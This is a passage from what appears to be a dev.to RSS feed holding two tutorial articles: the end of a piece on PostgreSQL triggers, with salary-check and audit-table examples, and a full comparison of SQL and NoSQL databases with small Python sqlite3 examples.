  2. Disabling Triggers
&lt;/h4&gt;

&lt;p&gt;PostgreSQL provides an easy way to disable triggers on a per-table basis using the ALTER TABLE command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;ALTER&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt; &lt;span class="n"&gt;DISABLE&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="k"&gt;trigger_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Sample Usage
&lt;/h4&gt;

&lt;p&gt;Using the employees table schema from the previous section, the following are examples of triggers in action. Both are written for PostgreSQL in PL/pgSQL; on PostgreSQL versions before 11, EXECUTE PROCEDURE is used in place of EXECUTE FUNCTION.&lt;/p&gt;

&lt;p&gt;The BEFORE trigger below checks whether the salary of a new employee is below 1000 before insertion. If it is, the trigger raises an error to prevent the insert, ensuring a minimum salary requirement is enforced.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Create a trigger function&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="k"&gt;REPLACE&lt;/span&gt; &lt;span class="k"&gt;FUNCTION&lt;/span&gt; &lt;span class="n"&gt;check_salary&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;RETURNS&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="err"&gt;$$&lt;/span&gt;
&lt;span class="k"&gt;BEGIN&lt;/span&gt;
    &lt;span class="c1"&gt;-- Check if the new salary is below 1000&lt;/span&gt;
    &lt;span class="n"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;NEW&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;salary&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="k"&gt;THEN&lt;/span&gt;
        &lt;span class="c1"&gt;-- If it is, raise an exception and block the insert&lt;/span&gt;
        &lt;span class="n"&gt;RAISE&lt;/span&gt; &lt;span class="n"&gt;EXCEPTION&lt;/span&gt; &lt;span class="s1"&gt;'Salary must be at least 1000.00'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;END&lt;/span&gt; &lt;span class="n"&gt;IF&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;-- Otherwise, allow the insert to proceed&lt;/span&gt;
    &lt;span class="k"&gt;RETURN&lt;/span&gt; &lt;span class="k"&gt;NEW&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;END&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="err"&gt;$$&lt;/span&gt; &lt;span class="k"&gt;LANGUAGE&lt;/span&gt; &lt;span class="n"&gt;plpgsql&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Create the BEFORE INSERT trigger using the function&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="n"&gt;before_insert_employees&lt;/span&gt;
&lt;span class="k"&gt;BEFORE&lt;/span&gt; &lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;EACH&lt;/span&gt; &lt;span class="k"&gt;ROW&lt;/span&gt;
&lt;span class="k"&gt;EXECUTE&lt;/span&gt; &lt;span class="k"&gt;FUNCTION&lt;/span&gt; &lt;span class="n"&gt;check_salary&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The AFTER trigger runs after a new employee is added, and if they're in the IT department, it creates a new audit table with a timestamped name. This simulates a DDL operation triggered by specific conditions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Create a trigger function&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="k"&gt;REPLACE&lt;/span&gt; &lt;span class="k"&gt;FUNCTION&lt;/span&gt; &lt;span class="n"&gt;create_audit_table&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;RETURNS&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="err"&gt;$$&lt;/span&gt;
&lt;span class="k"&gt;BEGIN&lt;/span&gt;
    &lt;span class="c1"&gt;-- Check if the inserted employee is in the 'IT' department&lt;/span&gt;
    &lt;span class="n"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;NEW&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;department&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'IT'&lt;/span&gt; &lt;span class="k"&gt;THEN&lt;/span&gt;
        &lt;span class="c1"&gt;-- Dynamically generate a new audit table with a timestamped name&lt;/span&gt;
        &lt;span class="c1"&gt;-- This simulates a DDL operation inside the trigger&lt;/span&gt;
        &lt;span class="k"&gt;EXECUTE&lt;/span&gt; &lt;span class="s1"&gt;'CREATE TABLE IF NOT EXISTS audit_employees_'&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;to_char&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NOW&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="s1"&gt;'YYYYMMDD_HH24MISS'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="s1"&gt;' (
            log_id SERIAL PRIMARY KEY,
            emp_id INT,
            action_time TIMESTAMP DEFAULT CURRENT_TIMESTAMP
        )'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;END&lt;/span&gt; &lt;span class="n"&gt;IF&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;-- Return NULL for AFTER trigger (since we don't need to modify row data)&lt;/span&gt;
    &lt;span class="k"&gt;RETURN&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;END&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="err"&gt;$$&lt;/span&gt; &lt;span class="k"&gt;LANGUAGE&lt;/span&gt; &lt;span class="n"&gt;plpgsql&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Create the AFTER INSERT trigger using the function&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="n"&gt;after_insert_employees&lt;/span&gt;
&lt;span class="k"&gt;AFTER&lt;/span&gt; &lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;EACH&lt;/span&gt; &lt;span class="k"&gt;ROW&lt;/span&gt;
&lt;span class="k"&gt;EXECUTE&lt;/span&gt; &lt;span class="k"&gt;FUNCTION&lt;/span&gt; &lt;span class="n"&gt;create_audit_table&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Advantages of Triggers
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Data Integrity: Triggers help enforce consistency and business rules, ensuring that data follows the correct format.&lt;/li&gt;
&lt;li&gt;Automation: Triggers eliminate the need for manual intervention by automatically performing tasks such as updating, inserting, or deleting records when certain conditions are met.&lt;/li&gt;
&lt;li&gt;Audit Trail: Triggers can track changes in a database, providing an audit trail of INSERT, UPDATE, and DELETE operations.&lt;/li&gt;
&lt;li&gt;Reduced workload: By automating repetitive tasks inside the database, triggers reduce manual work and application code, although each trigger adds some overhead to the statement that fires it.&lt;/li&gt;
&lt;/ul&gt;
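
&lt;p&gt;The audit trail advantage can be sketched with two small triggers. This example runs on an in-memory SQLite database through Python's sqlite3 module rather than PostgreSQL, so the trigger syntax differs slightly from the examples above; the employee_audit table and the trigger names are hypothetical.&lt;/p&gt;

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE employees (
    id INTEGER PRIMARY KEY,
    name TEXT,
    department TEXT,
    salary REAL
);
CREATE TABLE employee_audit (
    log_id INTEGER PRIMARY KEY AUTOINCREMENT,
    emp_id INTEGER,
    action TEXT
);
-- Record every inserted employee
CREATE TRIGGER log_employee_insert
AFTER INSERT ON employees
FOR EACH ROW
BEGIN
    INSERT INTO employee_audit (emp_id, action) VALUES (NEW.id, 'INSERT');
END;
-- Record every deleted employee
CREATE TRIGGER log_employee_delete
AFTER DELETE ON employees
FOR EACH ROW
BEGIN
    INSERT INTO employee_audit (emp_id, action) VALUES (OLD.id, 'DELETE');
END;
""")

# The application only touches employees; the triggers fill the audit table
conn.execute("INSERT INTO employees VALUES (1, 'Amina', 'Sales', 1200.0)")
conn.execute("DELETE FROM employees WHERE id = 1")

audit_rows = conn.execute(
    "SELECT emp_id, action FROM employee_audit ORDER BY log_id"
).fetchall()
print(audit_rows)
```

&lt;p&gt;Because the logging lives in the database, every client that modifies employees is audited without any extra application code.&lt;/p&gt;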

&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;p&gt;SQL triggers are useful tools for automating tasks, enforcing data integrity, and adding error handling and logging directly inside the database.&lt;/p&gt;

&lt;h3&gt;
  
  
  Summary
&lt;/h3&gt;

&lt;p&gt;Understanding CRUD is only the first step in learning SQL; real efficiency comes from using the powerful, often underused features that SQL has to offer. Views can streamline complicated queries and triggers can automate integrity checks. You're not just writing queries when you use these tools; you're creating more intelligent, self-sufficient data systems. Your entire stack becomes more maintainable, and your application has less work to do.&lt;/p&gt;

</description>
      <category>sql</category>
      <category>database</category>
    </item>
    <item>
      <title>SQL vs NoSQL: Choosing the Right Database for Your Needs</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Tue, 29 Apr 2025 08:09:46 +0000</pubDate>
      <link>https://dev.to/james_kariuki/sql-vs-nosql-choosing-the-right-database-for-your-needs-1pkh</link>
      <guid>https://dev.to/james_kariuki/sql-vs-nosql-choosing-the-right-database-for-your-needs-1pkh</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;When choosing a modern database, one of the biggest questions is whether to pick a relational or non-relational database. For most of the last 40 years, relational database management systems (RDBMSs) that use the query language SQL have been preferred.&lt;br&gt;
However, NoSQL-based non-relational database management systems are becoming more popular — particularly because data scientists want to expose their machine learning models and tools to more unstructured data.&lt;br&gt;
Let's explore these database types in greater detail, examining their uses, advantages, and popular implementations.&lt;/p&gt;

&lt;h2&gt;
  
  
  Relational Databases
&lt;/h2&gt;

&lt;p&gt;Relational databases organize data into interrelated tables, using a structured format that defines rows and columns within a schema. They connect information from various tables with keys. They use Structured Query Language (SQL) to store and retrieve data, hence the name SQL databases. A table uses columns to define the types of information being stored and rows to hold the actual data. Each table contains a column that must have unique values, referred to as the primary key. This primary key can be referenced from other tables to establish relationships between them. The image below shows how data is stored in this type of database.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi19c794cpm1xxlvsxkx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi19c794cpm1xxlvsxkx.png" alt="Relational database example" width="800" height="600"&gt;&lt;/a&gt;&lt;/p&gt;
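
&lt;p&gt;To make the idea of primary and foreign keys concrete, here is a minimal sketch using Python's built-in &lt;code&gt;sqlite3&lt;/code&gt; module. The &lt;code&gt;customers&lt;/code&gt; and &lt;code&gt;orders&lt;/code&gt; tables and their columns are hypothetical examples, not taken from the image above.&lt;/p&gt;

```python
import sqlite3

# In-memory database; table and column names are hypothetical examples.
conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # SQLite enforces foreign keys only when enabled

conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
conn.execute(
    "CREATE TABLE orders ("
    " id INTEGER PRIMARY KEY,"
    " customer_id INTEGER NOT NULL REFERENCES customers(id),"
    " item TEXT NOT NULL)"
)

conn.execute("INSERT INTO customers (id, name) VALUES (1, 'Amina')")
conn.execute("INSERT INTO orders (id, customer_id, item) VALUES (10, 1, 'keyboard')")

# The foreign key lets a JOIN connect each order to its customer.
rows = conn.execute(
    "SELECT customers.name, orders.item"
    " FROM orders JOIN customers ON customers.id = orders.customer_id"
).fetchall()
print(rows)

# An order that points at a missing customer is rejected.
try:
    conn.execute("INSERT INTO orders (id, customer_id, item) VALUES (11, 99, 'mouse')")
    orphan_rejected = False
except sqlite3.IntegrityError:
    orphan_rejected = True
print(orphan_rejected)
```

&lt;p&gt;The second insert fails because no customer with id 99 exists, which is the kind of integrity guarantee a relational schema provides.&lt;/p&gt;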

&lt;p&gt;&lt;strong&gt;Advantages of Relational Databases&lt;/strong&gt;&lt;br&gt;
• ACID compliance: Transactions satisfy four properties: atomicity, consistency, isolation, and durability. The general principle is that if one change in a transaction fails, the whole transaction fails, and the database remains in the state it was in before the transaction was attempted.&lt;br&gt;
• Better support options: Because RDBMSs have been around for over 40 years, it's easier to get support and integrate data from other systems.&lt;br&gt;
• Normalization: The process of normalization involves organizing the data so that redundancy and data anomalies are reduced or eliminated. Storing each fact only once can, in turn, reduce storage costs.&lt;/p&gt;
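
&lt;p&gt;The atomicity part of ACID can be sketched with Python's built-in &lt;code&gt;sqlite3&lt;/code&gt; module. The &lt;code&gt;accounts&lt;/code&gt; table, the account names, and the &lt;code&gt;transfer&lt;/code&gt; helper are hypothetical and exist only for illustration.&lt;/p&gt;

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE accounts ("
    " name TEXT PRIMARY KEY,"
    " balance INTEGER NOT NULL CHECK (balance >= 0))"
)
conn.execute("INSERT INTO accounts VALUES ('alice', 100), ('bob', 50)")
conn.commit()

def transfer(amount):
    """Move amount from alice to bob; both updates succeed or neither does."""
    try:
        with conn:  # commits on success, rolls back if an exception is raised
            conn.execute(
                "UPDATE accounts SET balance = balance + ? WHERE name = 'bob'", (amount,)
            )
            conn.execute(
                "UPDATE accounts SET balance = balance - ? WHERE name = 'alice'", (amount,)
            )
        return True
    except sqlite3.IntegrityError:
        return False

ok_small = transfer(30)   # fits within alice's balance
ok_large = transfer(500)  # would make alice's balance negative
balances = dict(conn.execute("SELECT name, balance FROM accounts"))
print(ok_small, ok_large, balances)
```

&lt;p&gt;In the failed transfer, the credit to bob is applied first and then undone when the debit from alice violates the &lt;code&gt;CHECK&lt;/code&gt; constraint, so the balances end up exactly as they were before that transaction started.&lt;/p&gt;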

&lt;p&gt;&lt;strong&gt;Challenges&lt;/strong&gt;&lt;br&gt;
• Scalability: RDBMSs were historically designed to run on a single machine. This means that if the machine's resources become insufficient due to data size or an increase in the frequency of access, you will have to improve the hardware, also known as vertical scaling. This can be incredibly expensive and has a ceiling, as eventually the costs outweigh the benefits.&lt;br&gt;
• Performance: The performance of the database is tightly linked to the number of tables, the complexity of their architecture, and the volume of data in each table. Query performance often degrades as RDBMSs scale.&lt;br&gt;
• Flexibility: In relational databases, the schema is rigid. You define the columns and the data types for those columns up front, including any constraints such as format or length.&lt;br&gt;
• Sharding: Dividing a large database into smaller parts that are spread across machines is difficult, because related rows may end up on different machines.&lt;/p&gt;
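
&lt;p&gt;As a rough illustration of what sharding means, the sketch below routes records to one of several shards by hashing their key. The shard count, the &lt;code&gt;shard_for&lt;/code&gt;, &lt;code&gt;put&lt;/code&gt;, and &lt;code&gt;get&lt;/code&gt; helpers, and the use of plain dictionaries in place of real servers are all assumptions made for this example.&lt;/p&gt;

```python
import hashlib

SHARD_COUNT = 4  # hypothetical number of database servers

def shard_for(key, shard_count=SHARD_COUNT):
    """Map a record key to a shard index using a stable hash."""
    digest = hashlib.sha256(key.encode("utf-8")).digest()
    return int.from_bytes(digest[:8], "big") % shard_count

# Each shard is modelled as a plain dict standing in for a separate server.
shards = [dict() for _ in range(SHARD_COUNT)]

def put(key, value):
    shards[shard_for(key)][key] = value

def get(key):
    return shards[shard_for(key)].get(key)

for user_id in ("user-1", "user-2", "user-3", "user-4", "user-5"):
    put(user_id, {"id": user_id})

print([len(s) for s in shards])  # how many records landed on each shard
print(get("user-3"))
```

&lt;p&gt;Looking up a single key stays simple, but a join or a transaction that touches records on different shards now has to be coordinated across machines, which is why sharding is harder for relational data.&lt;/p&gt;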

&lt;p&gt;&lt;strong&gt;Popular SQL Database Systems&lt;/strong&gt;&lt;br&gt;
MySQL&lt;br&gt;
• Free and open-source&lt;br&gt;
• A well-established database with a huge community, extensive testing, and a reputation for stability&lt;br&gt;
• Supports all major platforms&lt;br&gt;
• Replication is built in, and sharding is available through additional tooling&lt;br&gt;
• Simple to understand, very beginner-friendly&lt;/p&gt;

&lt;p&gt;PostgreSQL&lt;br&gt;
• Object-relational database management system that can also function as a hybrid SQL/NoSQL solution&lt;br&gt;
• Free and open-source&lt;br&gt;
• Compatibility with a wide range of operating systems&lt;br&gt;
• Active community and many third-party service providers&lt;br&gt;
• Fully ACID-compliant&lt;br&gt;
• Closely follows the SQL standard&lt;br&gt;
• Works well when some of the data doesn't fit a purely relational model, for extra-large databases, and when running complicated queries&lt;/p&gt;

&lt;p&gt;Oracle&lt;br&gt;
• Commercial database with frequent updates, professional management, and excellent customer support&lt;br&gt;
• Works with huge databases&lt;br&gt;
• Simple upgrades&lt;br&gt;
• Transaction control&lt;br&gt;
• Compatible with the major operating systems&lt;br&gt;
• Suitable for enterprises and organizations with demanding workloads&lt;/p&gt;

&lt;h2&gt;
  
  
  NoSQL/Non-Relational Databases
&lt;/h2&gt;

&lt;p&gt;Non-relational databases let you organize information in a looser fashion. They are also referred to as "Not Only SQL" (NoSQL) databases. Their storage models are optimized for specific types of data, allowing storage in diverse formats such as documents, key-value pairs, graphs, or columns. Below is an example of how data is stored in non-relational databases:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm51hpzk0077ayqlajwmp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm51hpzk0077ayqlajwmp.png" alt="Non-Relational db example" width="800" height="454"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Types of Non-Relational Databases&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Graph Stores&lt;br&gt;
• Make relationships in the data easier to visualize&lt;br&gt;
• Great at storing relationships between diverse data points, using nodes and the edges that connect them&lt;br&gt;
• Common examples: Neo4j and JanusGraph&lt;/p&gt;

&lt;p&gt;Column Stores&lt;br&gt;
• Schema-flexible databases in which each row can hold its own set of columns, suited to querying large, sparse datasets in real time&lt;br&gt;
• Common use cases: web analytics and analyzing data from sensors&lt;br&gt;
• Popular implementations: Apache Cassandra and HBase&lt;/p&gt;

&lt;p&gt;Key-Value Stores&lt;br&gt;
• Simple, fast database management systems that store key-value pairs&lt;br&gt;
• Designed to fetch basic data quickly&lt;br&gt;
• Common use cases: leaderboards and shopping cart data&lt;br&gt;
• Popular implementations: Redis and Couchbase Server&lt;/p&gt;

&lt;p&gt;Document Stores&lt;br&gt;
• Databases with flexible schemas&lt;br&gt;
• Best suited to storing semi-structured data, and able to handle dynamic querying&lt;br&gt;
• Common use cases: customer data, user-generated content, and order data&lt;br&gt;
• Examples: MongoDB and PostgreSQL (which can function as both a relational database and a document store through its JSON data types)&lt;/p&gt;
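
&lt;p&gt;The four models above can be pictured with plain Python data structures. This is only a simplified mental model, not how any of the named products store data internally, and every key, field, and name in it is made up for illustration.&lt;/p&gt;

```python
# Key-value store: opaque values looked up by key.
key_value = {"cart:42": ["keyboard", "mouse"], "leaderboard:top": "amina"}

# Document store: self-describing records whose fields can differ.
documents = [
    {"_id": 1, "name": "Amina", "email": "amina@example.com"},
    {"_id": 2, "name": "Brian", "tags": ["vip"], "address": {"city": "Nairobi"}},
]

# Wide-column store: each row key maps to its own, possibly different, set of columns.
wide_column = {
    "sensor-a": {"2025-04-29T08:00": 21.5, "2025-04-29T09:00": 22.1},
    "sensor-b": {"2025-04-29T08:00": 19.0},
}

# Graph store: nodes plus edges describing relationships.
edges = [("Amina", "FOLLOWS", "Brian"), ("Brian", "FOLLOWS", "Chao")]

def followed_by(person):
    """Return everyone the given person follows."""
    return [dst for src, rel, dst in edges if src == person and rel == "FOLLOWS"]

# Documents without an address are simply skipped; no schema change is needed.
cities = [doc["address"]["city"] for doc in documents if "address" in doc]

print(key_value["cart:42"], cities, followed_by("Amina"))
print(len(wide_column["sensor-a"]), "readings for sensor-a")
```

&lt;p&gt;Note how the two documents carry different fields and the two sensor rows carry different numbers of columns. That freedom is what "flexible schema" means in practice.&lt;/p&gt;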

&lt;p&gt;&lt;strong&gt;Advantages of NoSQL Databases&lt;/strong&gt;&lt;br&gt;
• Excellent for handling "big data" analytics: NoSQL databases remove the bottleneck of needing to categorize and apply strict structures to massive amounts of information.&lt;br&gt;
• Few limits on the types of data you can store: NoSQL databases let you store diverse types of data in the same place and add new and different types at any time.&lt;br&gt;
• Easier to scale: NoSQL databases are designed to be partitioned across multiple servers or data centers without much difficulty.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Disadvantages of NoSQL Databases&lt;/strong&gt;&lt;br&gt;
• Support challenges: It can be more difficult to find experienced users when you need to troubleshoot.&lt;br&gt;
• Compatibility and standardization issues: Newer NoSQL database systems lack the high degree of compatibility and standardization offered by SQL-based alternatives.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Popular NoSQL Database Systems&lt;/strong&gt;&lt;br&gt;
MongoDB, one of the most popular NoSQL databases, offers:&lt;br&gt;
• A free Community edition&lt;br&gt;
• Dynamic schema&lt;br&gt;
• Horizontal scalability&lt;br&gt;
• Excellent performance with simple queries&lt;br&gt;
• Ability to add new fields without impacting existing documents or application performance&lt;br&gt;
• A good fit for companies experiencing rapid growth or those with substantial unstructured data&lt;br&gt;
Other notable NoSQL alternatives include Apache Cassandra, Google Cloud Bigtable, and Apache HBase.&lt;/p&gt;

&lt;h2&gt;
  
  
  Use Cases
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;When to Use Relational Databases&lt;/strong&gt;&lt;br&gt;
• Structured Data: For well-organized data that fits neatly into rows and columns with a standard format&lt;br&gt;
• Complex Queries: Perfect for applications (like CRMs and financial systems) that require sophisticated queries and join operations&lt;br&gt;
• ACID Transactions: Necessary for sectors where data accuracy, consistency, and reliability are crucial, such as finance or e-commerce&lt;br&gt;
• Mature Ecosystem: Relational databases offer decades of tools, support, and integration options for enterprise-level requirements&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;When to Use Non-Relational (NoSQL) Databases&lt;/strong&gt;&lt;br&gt;
• Flexible Data Models: Ideal for semi-structured or unstructured data that may change over time, such as social media content&lt;br&gt;
• Scalability: Designed to scale horizontally across multiple servers, making them excellent for big data, IoT applications, and growing businesses&lt;br&gt;
• High Performance with Simple Queries: Great for real-time applications requiring quick reads and writes&lt;br&gt;
The table below summarizes the differences between SQL and NoSQL databases.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F072z5a4tqon0tghgvklc.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F072z5a4tqon0tghgvklc.webp" alt="summary table" width="700" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The choice between SQL and NoSQL databases ultimately depends on your specific use case, data structure requirements, scalability needs, and performance considerations. Many modern applications even utilize both types of databases to leverage the strengths of each approach. Understanding the fundamentals of both paradigms will help you make informed decisions when designing your data architecture.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
